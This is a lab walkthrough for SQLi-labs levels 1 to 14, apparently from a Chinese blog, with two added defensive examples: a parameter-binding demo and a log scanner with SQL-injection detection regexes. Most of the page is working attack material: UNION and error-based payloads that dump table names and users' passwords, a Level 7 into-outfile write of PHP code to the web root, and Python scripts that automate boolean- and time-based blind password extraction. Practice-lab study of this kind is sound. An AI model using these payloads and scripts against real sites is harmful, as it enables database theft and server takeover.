Contents
Level 1 (string-type injection)
Level 2 (numeric injection)
Level 3 (different closing method)
Level 4 (closed with double quotes)
Level 5 (no data echo)
Level 6 (different closing method: double quote ")
Level 7 (outfile injection)
Level 8 (boolean-based blind injection)
Level 9 (time-based blind injection)
Level 10 (different closing method)
Level 11 (POST injection)
Level 12 (different closing method: double quotes)
Level 13 (error-based injection)
Level 14 (double quotes)
Level 1 (string-type injection)
Checking whether an injection point exists
http://127.0.0.1/sqllabs/Less-1/?id=1
Checking whether the input is concatenated into the SQL statement
http://127.0.0.1/sqllabs/Less-1/?id=1'
http://127.0.0.1/sqllabs/Less-1/?id=1'--+
From these results we can conclude that the parameter is string-typed and that an SQL injection vulnerability exists. Because the page echoes query data, we can use a UNION query.
Union-based injection
Finding the column count
First find out how many columns the query returns: an error means the number exceeds the column count, a normal page means it does not (use bisection: start with a large value; if the page is normal, double it, if it errors, halve it).
http://127.0.0.1/sqllabs/Less-1/?id=1' order by 5--+
http://127.0.0.1/sqllabs/Less-1/?id=1' order by 3--+
http://127.0.0.1/sqllabs/Less-1/?id=1' order by 4--+
Finding the displayed positions
Since we now know the query has three columns, we use a UNION query to find which positions are echoed on the page.
http://127.0.0.1/sqllabs/Less-1/?id=1' union select 1,2,3--+
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,2,3--+
Because the page shows only one row, we need to change the id value so that it is either far beyond the table's range or less than 0; then the row from our UNION is the one displayed.
Getting the database name and version
We now know the echoed positions are the second and third columns, so we can output the database name and version directly.
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,database(),version()--+
Getting the table names
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+
information_schema.tables is the tables table of the information_schema database; group_concat() joins the query results together so they are displayed as one row. Without group_concat() the only result returned would be user.
Getting the column names
From the query results we know the current database has four tables; from their names we guess that accounts and passwords may be in the users table.
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
This statement queries all column_name values in the columns table of the information_schema database whose table_name field is users.
From the results, we guess that username and password hold the account name and password.
Getting the usernames and passwords
http://127.0.0.1/sqllabs/Less-1/?id=-1' union select 1,2,group_concat(username ,0x3a , password) from users--+
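To show why the single quote in Level 1 changes the query, here is an added example (not from the original post) that reproduces the lab's concatenation pattern in an in-memory SQLite table next to the same lookup using a bound parameter; the table contents are constructed, and the query shape `where id='...' limit 1` is an assumption about the lab code.

```python
import sqlite3

# Constructed stand-in for the lab's `users` table (rows are made up).
ROWS = [(1, "alice", "s3cret"), (2, "bob", "hunter2")]

# The page's own Level 1 payload, with the URL's trailing `+` decoded to a space.
UNION_PAYLOAD = "-1' union select 1,2,3-- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users(id integer, username text, password text)")
    conn.executemany("insert into users values (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    # Same shape as the lab (assumed): the raw request parameter is spliced into
    # the SQL text, so a quote inside it closes the literal and the rest is SQL.
    sql = "select id, username, password from users where id='%s' limit 1" % user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    # Placeholder binding: the value travels separately from the statement, so
    # quotes, comment markers and UNION inside it remain data, never SQL.
    sql = "select id, username, password from users where id=? limit 1"
    return conn.execute(sql, (user_id,)).fetchall()


def compare(user_id):
    """Run both lookups on a fresh database and return their rows side by side."""
    conn = make_db()
    try:
        return {"vulnerable": lookup_vulnerable(conn, user_id),
                "safe": lookup_safe(conn, user_id)}
    finally:
        conn.close()


if __name__ == "__main__":
    print(compare("1"))            # both return alice's row
    print(compare(UNION_PAYLOAD))  # vulnerable: [(1, 2, 3)]; safe: []
```

The bound version returns nothing for the payload because the whole string is compared against id as one value; the concatenated version returns the attacker-chosen row, which is exactly the "display position" behaviour the level relies on.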
Level 2 (numeric injection)
Checking whether an injection point exists
Enter a single quote; the error message shows that our input is passed into the database statement unchanged. This is called numeric injection: simply remove the single quote after id=1 from Level 1.
http://127.0.0.1/sqllabs/Less-2/?id=1'
http://127.0.0.1/sqllabs/Less-2/?id=1'--+
http://127.0.0.1/sqllabs/Less-2/?id=1
http://127.0.0.1/sqllabs/Less-2/?id=1--+
Union-based injection
Finding the column count (same idea as Level 1)
http://127.0.0.1/sqllabs/Less-3/?id=1' order by 5--+
http://127.0.0.1/sqllabs/Less-3/?id=1' order by 3--+
http://127.0.0.1/sqllabs/Less-3/?id=1' order by 4--+
Getting the database name and version
http://127.0.0.1/sqllabs/Less-2/?id=-1 union select 1,database(),version()--+
Getting the table names
http://127.0.0.1/sqllabs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+
Getting the column names
http://127.0.0.1/sqllabs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
Getting the usernames and passwords
http://127.0.0.1/sqllabs/Less-2/?id=-1 union select 1,2,group_concat(username ,0x3a , password) from users--+
Level 3 (different closing method)
http://127.0.0.1/sqllabs/Less-3/?id=1'
http://127.0.0.1/sqllabs/Less-3/?id=1'--+
http://127.0.0.1/sqllabs/Less-3/?id=1')
http://127.0.0.1/sqllabs/Less-3/?id=1')--+
Enter a single quote; the error message shows that our input is placed inside a single quote plus parentheses. Guess where our input 1 sits in the database statement: something like select … from … where id=('1') …. Compared with Level 1, add a ) after the single quote in id=1' and keep everything else the same.
Union-based injection
http://127.0.0.1/sqllabs/Less-3/?id=1'
http://127.0.0.1/sqllabs/Less-3/?id=1'--+
http://127.0.0.1/sqllabs/Less-3/?id=1')
http://127.0.0.1/sqllabs/Less-3/?id=1')--+
The closing sequence changes to ')
Getting the database name and version
http://127.0.0.1/sqllabs/Less-3/?id=-1') union select 1,database(),version()--+
Getting the table names
http://127.0.0.1/sqllabs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+
Getting the column names
http://127.0.0.1/sqllabs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
Getting the usernames and passwords
http://127.0.0.1/sqllabs/Less-3/?id=-1') union select 1,2,group_concat(username ,0x3a , password) from users--+
Level 4 (closed with double quotes)
After adjusting the closing sequence, the rest is the same as the previous levels
http://127.0.0.1/sqllabs/Less-3/?id=-1") union select 1,2,group_concat(username ,0x3a , password) from users--+
Level 5 (no data echo)
Nothing is echoed; the page only shows whether the query succeeded or failed, so we can choose boolean-based blind injection or error-based injection. Boolean blind injection mainly uses the three functions length(), ascii() and substr(), but I do not plan to use it on this level. Error-based injection mainly uses the three functions updatexml(), extractvalue() and floor().
http://127.0.0.1/sqllabs/Less-5/?id=1'
http://127.0.0.1/sqllabs/Less-5/?id=1'--+
On this level I use updatexml injection
Getting the database name and version
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat('~',(select database()),'~'),1)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat('~',(select version()),'~'),1)--+
Getting the table names
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)--+
Getting the column names
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)--+
Getting the usernames and passwords
updatexml can only show 32 characters of data at a time, so we have to take the data in pieces
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e),1)--+
extractvalue() injection
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select version()),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e))--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e))--+
floor() injection
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
http://127.0.0.1/sqllabs/Less-5/?id=1' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Level 6 (different closing method: double quote ")
Level 7 (outfile injection)
You need to know where the target's files are on disk before this can be used (it is rather limited in practice)
Interviews usually ask it this way:
How do you upload or export a shell with MySQL?
1. You must have the required privilege
2. secure_file_priv must be an empty value (not NULL)
3. You need the physical path of the target website's files
http://127.0.0.1/sqllabs/less-7/?id=-1%27))%20union%20select%201,user(),%27%3C?php%20phpinfo();?%3E%27%20into%20outfile%20%22F:\\phpstudy_pro\\WWW\\sqllabs\\webshell.php%22--+
Level 8 (boolean-based blind injection)
You will find that whatever you enter, no error is displayed, only a "You are in……". So we have to think of a form that gives one result for true and another for false: a boolean condition.
Write a Python script and let it enumerate the data automatically
Getting the database name
import requests

# Level 8: boolean-based blind, binary search on each character's ASCII code
def inject_database(url):
    name = ''
    for i in range(1, 20):
        min_value = 32
        max_value = 128
        mid = (min_value + max_value) // 2
        while min_value < max_value:
            payload = "?id=1' and ascii(substr(database(),%d,1))> %d--+" % (i, mid)
            r = requests.get(url + payload)
            if "You are in..........." in r.text:
                min_value = mid + 1  # condition true: the character is greater than mid
            else:
                max_value = mid      # condition false: the character is at most mid
            mid = (min_value + max_value) // 2
        if mid == 32:                # past the end of the string (ascii('') is 0), stop
            break
        name += chr(mid)
        print(name)
    return name

if __name__ == "__main__":
    url = 'http://127.0.0.1/sqllabs/Less-8/'
    inject_database(url)
Result:
Getting the table names
import requests

# Level 8: same binary search, but the target expression is now the table list
def inject_database(url):
    name = ''
    for i in range(1, 32):
        min_value = 32
        max_value = 128
        mid = (min_value + max_value) // 2
        while min_value < max_value:
            payload = "?id=1' and ascii(substr(concat((select group_concat(table_name)from information_schema.tables where table_schema='security')),%d,1))> %d--+" % (i, mid)
            r = requests.get(url + payload)
            if "You are in..........." in r.text:
                min_value = mid + 1
            else:
                max_value = mid
            mid = (min_value + max_value) // 2
        if mid == 32:  # end of the string reached
            break
        name += chr(mid)
        print(name)
    return name

if __name__ == "__main__":
    url = 'http://127.0.0.1/sqllabs/Less-8/'
    inject_database(url)
Result:
Getting the column names
import requests

# Level 8: same binary search, target expression is the column list of users
def inject_database(url):
    name = ''
    for i in range(1, 32):
        min_value = 32
        max_value = 128
        mid = (min_value + max_value) // 2
        while min_value < max_value:
            payload = "?id=1' and ascii(substr(concat((select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users')),%d,1))> %d--+" % (i, mid)
            r = requests.get(url + payload)
            if "You are in..........." in r.text:
                min_value = mid + 1
            else:
                max_value = mid
            mid = (min_value + max_value) // 2
        if mid == 32:  # end of the string reached
            break
        name += chr(mid)
        print(name)
    return name

if __name__ == "__main__":
    url = 'http://127.0.0.1/sqllabs/Less-8/'
    inject_database(url)
Getting the usernames and passwords
import requests

# Level 8: same binary search, target expression is the username:password list
def inject_database(url):
    name = ''
    for i in range(1, 1000):
        min_value = 32
        max_value = 128
        mid = (min_value + max_value) // 2
        while min_value < max_value:
            payload = "?id=1' and ascii(substr(concat((select group_concat(username ,0x3a , password) from users)),%d,1))> %d--+" % (i, mid)
            r = requests.get(url + payload)
            if "You are in..........." in r.text:
                min_value = mid + 1
            else:
                max_value = mid
            mid = (min_value + max_value) // 2
        if mid == 32:  # end of the string reached
            break
        name += chr(mid)
        print(name)
    return name

if __name__ == "__main__":
    url = 'http://127.0.0.1/sqllabs/Less-8/'
    inject_database(url)
Level 9 (time-based blind injection)
On this level, whatever SQL you enter, right or wrong, the page only shows You are in..........., so we conclude that this level needs time-based blind injection (make the server sleep and measure the delay).
Continue with the Python script
The earlier steps are about the same as Level 8; I only wrote the script for the final result
import requests
import time

# Level 9: the oracle is the response time instead of the page content
def inject_database(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "?id=1' and if(ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) > %d, sleep(3), 0)--+" % (i, mid)
            start_time = time.time()
            r = requests.get(url + payload)
            end_time = time.time()
            if end_time - start_time >= 1:  # a delay of at least 1 s means the condition was true
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:  # end of the string reached
            break
        name += chr(mid)
        print(name)
    return name

if __name__ == "__main__":
    url = 'http://127.0.0.1/sqllabs/Less-9/'
    inject_database(url)
Level 10 (different closing method)
Closed with double quotes
import requests
import time

# Level 10: same as Level 9, only the closing quote in the payload changes
def inject_database(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = '?id=1" and if(ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) > %d, sleep(1), 0)--+' % (i, mid)
            start_time = time.time()
            r = requests.get(url + payload)
            end_time = time.time()
            if end_time - start_time >= 1:  # response delayed: the condition was true
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:  # end of the string reached
            break
        name += chr(mid)
        print(name)
    return name

if __name__ == "__main__":
    url = 'http://127.0.0.1/sqllabs/Less-10/'
    inject_database(url)
Copyright notice: this article is the blogger's original work, released under the CC 4.0 BY-SA licence; reprints must include the original source link and this notice.
Original link: https://blog.csdn.net/huizhaohaha/article/details/138783298
Level 11 (POST injection)
Look at the page
We find that username is the injection point
However the form changes, the principle stays the same (it is about the same as a GET parameter)
We find that union query injection works, so next we dump the database, tables, columns and user accounts and passwords
aaa' union select 1,database()#
aaa' union select 1,group_concat(table_name) from information_schema.tables where table_schema ='security'#
aaa' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
aaa' union select 1,group_concat(username ,0x3a , password) from users#
Level 12 (different closing method: double quotes)
aaa") union select 1,database()#
aaa") union select 1,group_concat(table_name) from information_schema.tables where table_schema ='security'#
aaa") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
aaa") union select 1,group_concat(username ,0x3a , password) from users#
Level 13 (error-based injection)
aaa') and updatexml(1,user(),1)#
aaa') and updatexml(1,concat('~',(select database()),'~'),1)#
aaa') and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)#
aaa') and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)#
aaa') and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)#
Since only one field can be displayed at a time, we use limit to output the rows one by one
Level 14 (double quotes)
Different closing method
aaa" and updatexml(1,user(),1)#
aaa" and updatexml(1,concat('~',(select database()),'~'),1)#
aaa" and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)#
aaa" and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)#
aaa" and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)#
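As an added example from the detection side (not part of the original post), this scanner URL-decodes the request target of each access-log line and tags it with the payload families walked through in these levels: UNION, ORDER BY column probing, updatexml/extractvalue/floor error-based, ascii(substr()) boolean-blind, sleep() time-blind, information_schema enumeration and into outfile. The log lines are constructed to mirror the request shapes above; hosts, timestamps and sizes are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-format access-log lines shaped like the requests walked
# through on this page; host, timestamps and byte counts are invented.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /sqllabs/Less-1/?id=1 HTTP/1.1" 200 710
127.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /sqllabs/Less-1/?id=1'%20order%20by%204--+ HTTP/1.1" 200 650
127.0.0.1 - - [01/Jan/2024:10:00:02 +0000] "GET /sqllabs/Less-1/?id=-1'%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20='security'--+ HTTP/1.1" 200 720
127.0.0.1 - - [01/Jan/2024:10:00:03 +0000] "GET /sqllabs/Less-5/?id=1'%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+ HTTP/1.1" 200 640
127.0.0.1 - - [01/Jan/2024:10:00:04 +0000] "GET /sqllabs/Less-9/?id=1'%20and%20if(ascii(substr(database(),1,1))%3E64,sleep(3),0)--+ HTTP/1.1" 200 600
127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /sqllabs/less-7/?id=-1'))%20union%20select%201,user(),'x'%20into%20outfile%20'/tmp/x.txt'--+ HTTP/1.1" 200 600
127.0.0.1 - - [01/Jan/2024:10:00:06 +0000] "GET /sqllabs/Less-1/?id=2 HTTP/1.1" 200 705
"""

# One pattern per payload family seen on this page, matched against the
# URL-decoded, lower-cased request target.
SIGNATURES = {
    "union": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "column-count probe": re.compile(r"\border\s+by\s+\d+"),
    "error-based": re.compile(r"\b(?:updatexml|extractvalue)\s*\(|floor\s*\(\s*rand\s*\("),
    "boolean-blind": re.compile(r"\bascii\s*\(\s*substr\s*\("),
    "time-blind": re.compile(r"\bsleep\s*\("),
    "schema-enumeration": re.compile(r"\binformation_schema\."),
    "file-write": re.compile(r"\binto\s+outfile\b"),
}

LOG_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')

def classify_target(target):
    """Families whose markers appear in the decoded request target (empty set if clean)."""
    decoded = unquote_plus(target).lower()  # %27 -> ', %20 and + -> space, %3E -> >
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}

def scan_log(text):
    """Return (request target, sorted family names) for every suspicious line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m:
            families = classify_target(m.group("target"))
            if families:
                hits.append((m.group("target"), sorted(families)))
    return hits

if __name__ == "__main__":
    for target, families in scan_log(SAMPLE_LOG):
        print(", ".join(families), "<-", target)
```

POST-body payloads like those of Levels 11 to 14 never appear in a standard access log, so the same classify_target() would have to be fed the form fields from application-level logging or a WAF; a normal id=1 request produces no tags.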